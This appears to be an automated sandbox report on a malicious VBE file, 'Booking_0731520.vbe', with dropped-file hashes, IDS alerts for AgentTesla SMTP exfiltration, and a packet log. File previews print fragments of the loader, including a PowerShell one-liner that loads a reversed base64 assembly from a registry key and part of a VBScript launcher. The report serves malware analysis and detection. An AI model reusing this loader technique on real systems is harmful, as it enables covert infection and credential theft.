                                                    SSDEEP:96:RSIU6o7wVetbDDTjxfiUe6YKiqgmfHNV9reHJP5aM95m:R6l7wVeJDDTjZiUe6YKiqgmftq/p95m
                                                    MD5:2098585255E599AFFBE5FDAB5403ECDD
                                                    SHA1:9E92C7CE1485B4DA80A394B9BDED00A79B3D8951
                                                    SHA-256:BEE501A85E1B5B353F87914FFE87E8432ED028B22AC62056C1CEB5F4AC1B3240
                                                    SHA-512:07E0599187C165BCB0D3D13CD1BF8CCD5D0EA1C58745F09584B063CA735FF6801837BEA0309CF71394511CD9535FA3B5E2AC7A30DB44247EC1ADD9F5D6143AA8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.9.2.<./.P.i.
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4899
                                                    Entropy (8bit):4.569831397673442
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsoJg771I9b4WpW8VY5Ym8M4JFKlnOtSFAyq8vT0OtS8nytf2gd:uIjfuI7cx7VRJFKlnaWT0ynuf2gd
                                                    MD5:1146B8D5982518AEBCA0F09C4E408639
                                                    SHA1:39AAD39F77B90B693DB418164A7C119F38402DAF
                                                    SHA-256:F84C000AB8FFFF6BF11040FEDB393EF1AC0626B23115A3D844FFF83420E041A9
                                                    SHA-512:AE7D9B70AA9CABE34124F9F7DD545767F3020A9AA9A2D1EE2314054AEC7A203124AE8204ED6931EA02C2C62CB383198D4CB8FB28ADCDAD45CC97B0445502EF0B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="584863" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11887
                                                    Entropy (8bit):4.901437212034066
                                                    Encrypted:false
                                                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3256
                                                    Entropy (8bit):5.404109340363203
                                                    Encrypted:false
                                                    SSDEEP:96:gEzlHyIFKL2O9qrh7Kf+oRJ5Eo9AdrxwN:V1yt2jrAfRLL2G
                                                    MD5:047B195D3B8C00130835658997B1925D
                                                    SHA1:5F77C7A5F798C4C0253839EBD7554B13987704E3
                                                    SHA-256:B2C2801565403B2348CAF820F20B4B92C8725A5079D5360DAF455E84D28AC1FB
                                                    SHA-512:D1724BE394B214B914A236AC1D55DB17B93669880BB3F71057DCD070AF3062FBFF494ABE085345015FCDF5FE6B11BAE9A19FCD20DC4EB749E13F31CD5565D60D
                                                    Malicious:false
                                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):252
                                                    Entropy (8bit):5.438866247103481
                                                    Encrypted:false
                                                    SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83ULgvDoXZuBiA2V0LYGg3FI59:772EtSXqdAJci1V0LYHo
                                                    MD5:754B5295ADED4BB9A70035A56DA441A6
                                                    SHA1:FF3AB4CD8B4364EBE9FFF8392C409FD38013AEA5
                                                    SHA-256:64D32D3B1FA23EC072053EBC6C08F687CA96B894ACB1E5D26316D6F59088CE33
                                                    SHA-512:9D16E0CACD5B1F253345B0B3BD54B5A9BA4EE27A936BA6C3E2DF68442B5265EA5E61F1432BCD7CFE62766011F7C08571876695BB011CAF7C295AFD268F7446C5
                                                    Malicious:false
                                                    Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\PPJeBFdmEDGXlnL' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('PPJeBFdmEDGXlnL')..Stop-Process -Name conhost -Force..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.6936133581898103
                                                    Encrypted:false
                                                    SSDEEP:48:WDLH7CpbU2K+ZtukvhkvklCywrn2k2niWlzHSogZomE2niWlIHSogZoS1:Kz7CaoWkvhkvCCtL2niWYHo2niW9HV
                                                    MD5:BB0E83285D846DE2CE52AF7449ABCBAF
                                                    SHA1:C0F95E6566C859D8914849457A053128FFA9D635
                                                    SHA-256:8FA2C6635C980DAC5EB27DF15CACD0EC670FC121DD44710888BA35918C4E50AC
                                                    SHA-512:4BC2764B62A62723405C5330E57A58C39E6CE4F5C7C3E551ADABDC79EA2C142093D90103A8FF04ADF61DBD08D18A0BA51E88612775A4DAF005926DA780427DC8
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.......]2".5..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....y.[..4....9".5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSllY.d....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....lY.e..Roaming.@......DWSllY.e....C.....................{...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSllY.d....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSllY.d....E.......................%.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSllY.d....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSllY.d....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSllY"e....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.6936133581898103
                                                    Encrypted:false
                                                    SSDEEP:48:WDLH7CpbU2K+ZtukvhkvklCywrn2k2niWlzHSogZomE2niWlIHSogZoS1:Kz7CaoWkvhkvCCtL2niWYHo2niW9HV
                                                    MD5:BB0E83285D846DE2CE52AF7449ABCBAF
                                                    SHA1:C0F95E6566C859D8914849457A053128FFA9D635
                                                    SHA-256:8FA2C6635C980DAC5EB27DF15CACD0EC670FC121DD44710888BA35918C4E50AC
                                                    SHA-512:4BC2764B62A62723405C5330E57A58C39E6CE4F5C7C3E551ADABDC79EA2C142093D90103A8FF04ADF61DBD08D18A0BA51E88612775A4DAF005926DA780427DC8
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.......]2".5..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....y.[..4....9".5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSllY.d....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....lY.e..Roaming.@......DWSllY.e....C.....................{...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSllY.d....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSllY.d....E.......................%.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSllY.d....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSllY.d....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSllY"e....q...........
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:ISO-8859 text
                                                    Category:dropped
                                                    Size (bytes):2012
                                                    Entropy (8bit):5.053973028894199
                                                    Encrypted:false
                                                    SSDEEP:48:RYuJ3nk3ZOSbrXZgjHVtrzejwPOWg8qhqFTUJZfYR8lBc4+rF:jcOIX67fzy5SqkMNyGc4+R
                                                    MD5:4097C973A71DB17E24573739A029F321
                                                    SHA1:00D4BA0C67A084895C70DD189CF208DA6B28B73C
                                                    SHA-256:6723F6C69D0E2B7D4834D1B47D97D61EF7B9552A23075D16BF98DDEC260447E4
                                                    SHA-512:A73EB26B1ED86201538EC188D2CA572A37D996CDFD58615D464264E8995D46BB2C327CD6965BE3E71A6DC36528D4204982FAE1FD3D454219B1A291AA4C93A7B6
                                                    Malicious:false
                                                    Preview:Option Explicit..' Nombre del proyecto: PPJeBFdmEDGXlnL.' Variables globales.Dim SSH, RWD, CBL.Set SSH = CreateObject("WScript.Shell").RWD = SSH.ExpandEnvironmentStrings("%windir%")..' Inicializaci.n de los par.metros del programa.Sub INP(). CBL = 0.End Sub..' Funci.n para verificar si un proceso espec.fico est. en ejecuci.n.Function PEQ(NPR). Dim SWI, LPA. Set SWI = GetObject("winmgmts:\\.\root\cimv2"). Set LPA = SWI.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & NPR & "'"). . PEQ = (LPA.Count > 0).End Function..' Procedimiento para iniciar PowerShell.Sub IPS(). SSH.Run RWD & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2.End Sub..' Funci.n para buscar un proceso PowerShell en ejecuci.n.Function BPS(). Dim LPR, PAC. Set LPR = GetObject("winmgmts:").InstancesOf("Win32_Process"). . For Each PAC In LPR. If StrComp(PAC.Name, "powershell.exe", vbTextCompare) = 0 Then. Set BPS = PAC. Exit Function. End If.
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                                    Category:dropped
                                                    Size (bytes):1665
                                                    Entropy (8bit):4.490045339753992
                                                    Encrypted:false
                                                    SSDEEP:48:E6WQWxZziKyST+OAX+X5XpXKX/XFXoXQXDX5:E6TEZziKySTr4
                                                    MD5:CF03ED750C6C2A1BAA2DE70F41F2746A
                                                    SHA1:5CB38CBECFCA790D6DA1D7AF92DD568D14A142D8
                                                    SHA-256:622F287D823A528B74E61064063E7DB8344B7F61F5F8ED502FCDC54A474E0E5B
                                                    SHA-512:E73560CDAFD3F848ED4303C26876A4D1B8BFE7B1BD6D5D4550584C146DCDE68A77BD6A4380EB58EB843827A1C6637EACA2EE1EA74196C54418B55EE227795F1D
                                                    Malicious:false
                                                    Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConv.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m(.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\PPJeBFdmEDGXlnL'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'PPJeBFdmEDGXlnL'.[33m).[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[
                                                    File type:data
                                                    Entropy (8bit):3.9029235707037766
                                                    TrID:
                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                    • MP3 audio (1001/1) 32.22%
                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                    • Corel Photo Paint (41/41) 1.32%
                                                    File name:Booking_0731520.vbe
                                                    File size:9'826 bytes
                                                    MD5:134984e6d7545ba5eb30563498459f72
                                                    SHA1:58ebeaa8da58484f3fcc371b436243e49e41d507
                                                    SHA256:98b8949bd59e771f6e2cd4366783145ea645fe71d255e92462864551292113a9
                                                    SHA512:8646a60160540e5342169ba4c7d636efd6fd1ed0b7dfb39a0c21cb9f38fe367200a128bf269fa89fe2d8f496194f52347bf8d3cf524e70e4fd646a895ad0b054
                                                    SSDEEP:192:DwlgjmTN5A/gHSf1tVEKriWTJOg+tG/HTKDlSK:cO2pK1tGKmd9E/HTKDlX
                                                    TLSH:DA12E054CE9D01C1F32267C65BDAABD50B2F6D606B0F4AD70C6482C7272EEC1A666F30
                                                    File Content Preview:..#.@.~.^.F.x.M.A.A.A.=.=.v.h.n.B...A.w.N.:.A.f.V.p.V...S.@.#.@.&.E.1.G.h.,.N.E.,.2.D.K.L.+.D.~.l.P.r.n.m.Y.4.J.@.#.@.&.@.#.@.&.6.w.D.r.W...P.3.a.a.V.k.^.r.D.@.#.@.&.@.#.@.&.v.,.e.M.C.P.w.W.x.1.Y.b.G.x.,.w.G.E.M.P...n.s.w.V.m.^.+.M.P.N...d.~.W.1.m.!.D...+
                                                    Icon Hash:68d69b8f86ab9a86
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-12T13:39:42.481624+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549983162.254.34.31587TCP
                                                    2024-11-12T13:39:42.481624+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549983162.254.34.31587TCP
                                                    2024-11-12T13:39:48.072675+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704172.67.215.48443TCP
                                                    2024-11-12T13:39:49.557492+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.215.48443TCP
                                                    2024-11-12T13:39:50.915029+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.215.48443TCP
                                                    2024-11-12T13:40:04.633177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.215.48443TCP
                                                    2024-11-12T13:40:05.930252+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.215.48443TCP
                                                    2024-11-12T13:40:06.552482+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549707TCP
                                                    2024-11-12T13:40:45.748023+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549920TCP
                                                    2024-11-12T13:41:13.436879+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549983162.254.34.31587TCP
                                                    2024-11-12T13:41:13.436879+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549983162.254.34.31587TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 12, 2024 13:39:47.446396112 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:47.446449995 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:47.446536064 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:47.448018074 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:47.448035002 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.072509050 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.072674990 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.076066971 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.076075077 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.076364994 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.122256041 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.122903109 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.163325071 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515608072 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515647888 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515675068 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515705109 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515733004 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515743017 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.515753984 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515784025 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.515805960 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.515810013 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.515971899 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.516001940 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.516005039 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.516012907 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.516052961 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.636708021 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.640619040 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.640655994 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.640685081 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.640705109 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.640711069 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.640722036 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.640764952 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.640764952 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.640778065 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.641309023 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.641366959 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.641375065 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.684725046 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.684746981 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.725197077 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.760586977 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.761461020 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.761599064 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.774013996 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.774036884 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.774065018 CET49704443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.774071932 CET44349704172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.930536985 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.930582047 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:48.930660963 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.930969954 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:48.930985928 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.557369947 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.557492018 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.558756113 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.558765888 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.559041977 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.559922934 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.603337049 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954081059 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954149961 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954180956 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954211950 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954210997 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.954253912 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954272985 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.954297066 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954335928 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.954339027 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954350948 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.954387903 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.954533100 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:49.997205019 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:49.997246981 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.044075966 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:50.073508978 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080269098 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080305099 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080332994 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080395937 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:50.080435038 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080451012 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:50.080522060 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080547094 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080560923 CET49705443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:39:50.080568075 CET44349705172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:39:50.080601931 CET49705443192.168.2.5172.67.215.48
